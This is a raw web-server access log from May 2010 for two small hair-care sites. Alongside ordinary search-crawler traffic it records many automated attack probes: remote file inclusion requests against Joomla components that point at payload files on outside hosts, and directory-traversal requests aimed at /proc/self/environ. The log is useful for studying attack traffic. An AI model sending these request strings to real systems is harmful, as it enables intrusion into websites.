77.88.25.28 - - [17/May/2010:16:28:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:16:30:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13072 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
193.105.210.165 - - [17/May/2010:16:41:29 -0700] "GET /freehairsecretsphp/index.php+%28200+ok%29+ACCEPTED HTTP/1.0" 404 - "http://www.freehairsecrets.com/freehairsecretsphp/index.php+%28200+ok%29+ACCEPTED" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
193.105.210.165 - - [17/May/2010:16:41:30 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:16:55:34 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
78.137.163.133 - - [17/May/2010:17:05:35 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
78.137.163.133 - - [17/May/2010:17:05:35 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.freehairsecrets.com"
77.221.130.2 - - [17/May/2010:17:08:12 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:17:08:12 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:17:08:12 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:11:47 -0700] "GET /shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:11:47 -0700] "GET /logs//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:11:47 -0700] "GET /logs/access_100308.log%20%20//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:11:53 -0700] "GET /shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:11:53 -0700] "GET /logs/access_100308.log%20%20//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:11:53 -0700] "GET /logs//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:17:12:02 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:17:13:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:17:13:59 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:17:13:59 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:14:24 -0700] "GET /logs//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [17/May/2010:17:14:24 -0700] "GET /shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [17/May/2010:17:14:24 -0700] "GET /logs/access.log%20%20//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [17/May/2010:17:14:38 -0700] "GET /shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [17/May/2010:17:14:38 -0700] "GET /logs//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [17/May/2010:17:14:38 -0700] "GET /logs/access.log%20%20//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.130.2 - - [17/May/2010:17:15:59 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:16:37 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:16:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:16:38 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.114.22 - - [17/May/2010:17:21:15 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.22 - - [17/May/2010:17:21:16 -0700] "GET /?S=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
94.125.182.40 - - [17/May/2010:17:27:09 -0700] "GET /errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
94.125.182.40 - - [17/May/2010:17:27:09 -0700] "GET /errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:17:27:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14682 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
69.175.83.34 - - [17/May/2010:17:28:25 -0700] "GET /logs/access.log//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.236.211.159 - - [17/May/2010:17:28:53 -0700] "GET /logs/access.log HTTP/1.1" 200 357769 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
69.175.83.34 - - [17/May/2010:17:29:13 -0700] "GET /logs/access.log//shop/kimsq//_sys/_ext/skin/_skin/default_gallery/delete_all.php?bbs[skin]=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
111.89.128.186 - - [17/May/2010:17:32:44 -0700] "GET /logs/access_100315.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
95.108.142.138 - - [17/May/2010:17:32:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [17/May/2010:17:32:52 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.142.138 - - [17/May/2010:17:32:53 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [17/May/2010:17:32:54 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
95.108.142.138 - - [17/May/2010:17:32:55 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.freehairsecrets.com"
95.108.142.138 - - [17/May/2010:17:32:56 -0700] "GET / HTTP/1.1" 200 926 "-" "Yandex/1.01.001 (compatible; Win16; H)" "freehairsecrets.com"
208.80.193.32 - - [17/May/2010:17:38:05 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={89509D04-91D7-4677-A09D-283E0A4A77D9}; FunWebProducts; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
78.138.88.246 - - [17/May/2010:17:43:54 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [17/May/2010:17:43:54 -0700] "GET /logs///modules/vwar/admin/admin.php?vwar_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [17/May/2010:17:43:54 -0700] "GET /logs/access_100419.log%20%20///modules/vwar/admin/admin.php?vwar_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [17/May/2010:17:44:06 -0700] "GET /logs/access_100419.log///modules/vwar/admin/admin.php?vwar_root=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:44:32 -0700] "GET /logs/access_100412.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:44:32 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:44:33 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.125.182.40 - - [17/May/2010:17:46:47 -0700] "GET /logs/access_100503.log/errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
94.125.182.40 - - [17/May/2010:17:46:47 -0700] "GET /errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
94.125.182.40 - - [17/May/2010:17:46:47 -0700] "GET /logs//errors.php?error=http://frezz.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:17:51:43 -0700] "GET /logs/access_100426.log/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
220.181.94.229 - - [17/May/2010:17:52:48 -0700] "GET / HTTP/1.1" 200 926 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [17/May/2010:17:52:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:17:56:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13400 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:17:57:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5607 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
212.235.107.58 - - [17/May/2010:18:06:57 -0700] "GET /freehairsecretsphp/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "freehairsecrets.com"
111.89.128.186 - - [17/May/2010:18:08:25 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:18:08:25 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.40.35.78 - - [17/May/2010:18:10:23 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
77.40.35.78 - - [17/May/2010:18:10:24 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
77.40.35.78 - - [17/May/2010:18:10:25 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "growlonghairfast.com"
220.181.7.28 - - [17/May/2010:18:10:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12245 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
111.89.128.186 - - [17/May/2010:18:11:41 -0700] "GET /stubjambo.php?baseDir=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:18:11:42 -0700] "GET /logs//stubjambo.php?baseDir=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:18:15:53 -0700] "GET /logs/access_100125.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:18:23:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15355 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.221.137.18 - - [17/May/2010:18:30:23 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:30:23 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:30:23 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:24 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:24 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:24 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:28 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:28 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:28 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:35 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:35 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:35 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:37 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:37 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:37 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:30:43 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:30:43 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:30:43 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:59 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:59 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:30:59 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:31:03 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:31:03 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:18:31:03 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:31:45 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:31:45 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:18:31:49 -0700] "GET /logs/access_100510.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.126.213.59 - - [17/May/2010:18:33:53 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:18:34:24 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:18:34:44 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:18:37:36 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:18:38:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.61.185.200 - - [17/May/2010:18:38:11 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:18:38:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:18:40:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
222.231.60.209 - - [17/May/2010:18:40:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
222.231.60.209 - - [17/May/2010:18:44:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:18:45:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:18:50:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4711 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
75.126.213.59 - - [17/May/2010:18:52:50 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.126.213.59 - - [17/May/2010:18:52:50 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.126.213.59 - - [17/May/2010:18:52:50 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:18:52:57 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:18:52:58 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:18:52:58 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:18:53:44 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.195.111.220 - - [17/May/2010:18:55:24 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
222.231.60.209 - - [17/May/2010:18:55:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
67.195.111.220 - - [17/May/2010:18:56:28 -0700] "GET /?D=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:18:56:47 -0700] "GET /logs/access_100503.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:18:56:48 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
66.7.203.196 - - [17/May/2010:18:56:48 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
85.92.73.143 - - [17/May/2010:18:58:28 -0700] "GET /index.php?option=com_extcalendar=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
